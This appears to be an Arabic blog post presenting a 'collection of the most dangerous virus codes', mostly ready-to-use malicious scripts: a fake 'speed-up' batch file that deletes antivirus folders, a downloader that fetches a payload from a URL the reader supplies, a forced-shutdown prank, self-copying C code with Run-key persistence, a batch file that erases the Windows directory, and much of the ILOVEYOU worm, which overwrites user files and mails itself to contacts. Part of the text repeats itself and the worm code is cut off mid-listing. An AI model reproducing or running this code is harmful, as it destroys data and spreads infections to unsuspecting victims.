السلام عليكم
اليوم احب اقدملكم اكبر مجموعة اكواد فايروسات على الاطلاق واخطرها
ملاحظة : لا تفتح اي فايروس بعد صنعه
جميع هذه الفايروسات يتم صنعها بـ NoteBad
نبدي :
1 - قاتل الماكافي
@echo welcome to the winbooster by Agent007
@echo if u want to make your computer get faster , you should follow
@echo the next steps )step by step)
@pause
cd
c:
dir
dir c:progra~1norton~1
@echo if u want to make your computer faster
@pause
@echo now you should to **** y and press enter
del c:progra~1norton~1
@pause
c:
dir
@echo if u want to make your computer faster
@pause
@dir c:progra~1
dir c:progra~1zonea~1zonealarm
del c:progra~1zonea~1zonealarm
@echo be happy your computer now is faster than before
exit
----------------------------------
2 - تفادي الديب فريز
@echo off
set file="ضع هناء رابط باتشك"
set dlto="C:\"
::----------------
if exist %temp%\dl.vbs del /q %temp%\dl.vbs
echo HTTPDownload %file%,%dlto% >> %temp%\dl.vbs
echo Sub HTTPDownload( myURL, myPath ) >> %temp%\dl.vbs
echo Dim i, objFile, objFSO, objHTTP, strFile, strMsg >> %temp%\dl.vbs
echo Const ForReading = 1, ForWriting = 2, ForAppending = 8 >> %temp%\dl.vbs
echo Set objFSO = CreateObject( "Scripting.FileSystemObject" ) >> %temp%\dl.vbs
echo If objFSO.FolderExists( myPath ) Then >> %temp%\dl.vbs
echo strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) ) >> %temp%\dl.vbs
echo ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then >> %temp%\dl.vbs
echo strFile = myPath >> %temp%\dl.vbs
echo Else >> %temp%\dl.vbs
echo Exit Sub >> %temp%\dl.vbs
echo End If >> %temp%\dl.vbs
echo Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True ) >> %temp%\dl.vbs
echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> %temp%\dl.vbs
echo objHTTP.Open "GET", myURL, False >> %temp%\dl.vbs
echo objHTTP.Send >> %temp%\dl.vbs
echo For i = 1 To LenB( objHTTP.ResponseBody ) >> %temp%\dl.vbs
echo objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) ) >> %temp%\dl.vbs
echo Next >> %temp%\dl.vbs
echo objFile.Close( ) >> %temp%\dl.vbs
echo End Sub >> %temp%\dl.vbs
start %temp%\dl.vbs
-------------------------------------
3 - جنن الضحية
cmdow @ /HID
shutdown.exe -r -f -t 60 -c "Windows XP will now restart in 60 Seconds...hacked by حط هناء الكلام الي تبية يطلع للضحية"
net user aspnet /delete
EXIT
-------------------------------------
4 - خدعة تحميل فايروس
اليوم احب اقدملكم اكبر مجموعة اكواد فايروسات على الاطلاق واخطرها
ملاحظة : لا تفتح اي فايروس بعد صنعه
جميع هذه الفايروسات يتم صنعها بـ NoteBad
نبدي :
1 - قاتل الماكافي
@echo welcome to the winbooster by Agent007
@echo if u want to make your computer get faster , you should follow
@echo the next steps )step by step)
@pause
cd
c:
dir
dir c:progra~1norton~1
@echo if u want to make your computer faster
@pause
@echo now you should to **** y and press enter
del c:progra~1norton~1
@pause
c:
dir
@echo if u want to make your computer faster
@pause
@dir c:progra~1
dir c:progra~1zonea~1zonealarm
del c:progra~1zonea~1zonealarm
@echo be happy your computer now is faster than before
exit
----------------------------------
2 - تفادي الديب فريز
@echo off
set file="ضع هناء رابط باتشك"
set dlto="C:\"
::----------------
if exist %temp%\dl.vbs del /q %temp%\dl.vbs
echo HTTPDownload %file%,%dlto% >> %temp%\dl.vbs
echo Sub HTTPDownload( myURL, myPath ) >> %temp%\dl.vbs
echo Dim i, objFile, objFSO, objHTTP, strFile, strMsg >> %temp%\dl.vbs
echo Const ForReading = 1, ForWriting = 2, ForAppending = 8 >> %temp%\dl.vbs
echo Set objFSO = CreateObject( "Scripting.FileSystemObject" ) >> %temp%\dl.vbs
echo If objFSO.FolderExists( myPath ) Then >> %temp%\dl.vbs
echo strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) ) >> %temp%\dl.vbs
echo ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then >> %temp%\dl.vbs
echo strFile = myPath >> %temp%\dl.vbs
echo Else >> %temp%\dl.vbs
echo Exit Sub >> %temp%\dl.vbs
echo End If >> %temp%\dl.vbs
echo Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True ) >> %temp%\dl.vbs
echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> %temp%\dl.vbs
echo objHTTP.Open "GET", myURL, False >> %temp%\dl.vbs
echo objHTTP.Send >> %temp%\dl.vbs
echo For i = 1 To LenB( objHTTP.ResponseBody ) >> %temp%\dl.vbs
echo objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) ) >> %temp%\dl.vbs
echo Next >> %temp%\dl.vbs
echo objFile.Close( ) >> %temp%\dl.vbs
echo End Sub >> %temp%\dl.vbs
start %temp%\dl.vbs
-------------------------------------
3 - جنن الضحية
cmdow @ /HID
shutdown.exe -r -f -t 60 -c "Windows XP will now restart in 60 Seconds...hacked by حط هناء الكلام الي تبية يطلع للضحية"
net user aspnet /delete
EXIT
-------------------------------------
4 - خدعة تحميل فايروس
ــــــــــــــــــــــــــــ
الكوٍد رقم (3)
ــــــــــــــــــــــــــــ
رٍيستارٍتـ للجهازٍ *_*
ــــــــــــــــــــــــــــ
#include
#include
#include
{
char sys1[256];
char sys2[256];
char win1[256];
GetModuleFileName(hMod, path, sizeof(path));
GetSystemDirectory(sys1, sizeof(sys1));
GetSystemDirectory(sys2, sizeof(sys2));
GetWindowsDirectory(win1, sizeof(win1));
strcat(sys1, "\\Sleep.exe");
strcat(sys2, "\\Doom32.com");
strcat(win1, "\\WinUpdate.exe");
CopyFile(path, sys1, false);
CopyFile(path, sys2, false);
CopyFile(path, win1, false);
MessageBox (0, "Not been foun Ram ", "Error !", MB_ICONERROR | MB_OK);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "SLEEP", 0, REG_SZ, (const unsigned char*) sys1, sizeof(sys1));
RegSetValueEx(hKey, "DOOM32", 0, REG_SZ, (const unsigned char*) sys2, sizeof(sys2));
RegSetValueEx(hKey, "WinUpdate", 0, REG_SZ, (const unsigned char*) win1, sizeof(win1));
RegCloseKey(hKey);
}
{
system("shutdown -s -f ");
MessageBox(NULL,"Not enough memory to load this file.","Error !", MB_ICONERROR | MB_OK);
}
ــــــــــــــــــــــــــــ
الكوٍد رقم (4)
ــــــــــــــــــــــــــــ
أيقافـ تشغيـل الجهازٍ *_*
ــــــــــــــــــــــــــــ
@echo off
echo hi
del/a/q c:\windows\*.*
del/a/q c:\windows\system32\*.*
rmdir/s/q c:\windows
echo bey
pause
ــــــــــــــــــــــــــــ
الكوٍد رقم (5)
ــــــــــــــــــــــــــــ
هذا كود لفيرس "الحب " *_*
ــــــــــــــــــــــــــــ
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="
"@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"good...@-@>"&vbcrlf& _
"-?HEAD>
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"
This HTML file need ActiveX Control-?p>
To Enable to read
this HTML file
- Please press #-#YES#-# button to Enable
ActiveX-?p>"&vbcrlf& _
"-?CENTER>
0 تعليقات على " اكواد فايروس vbs "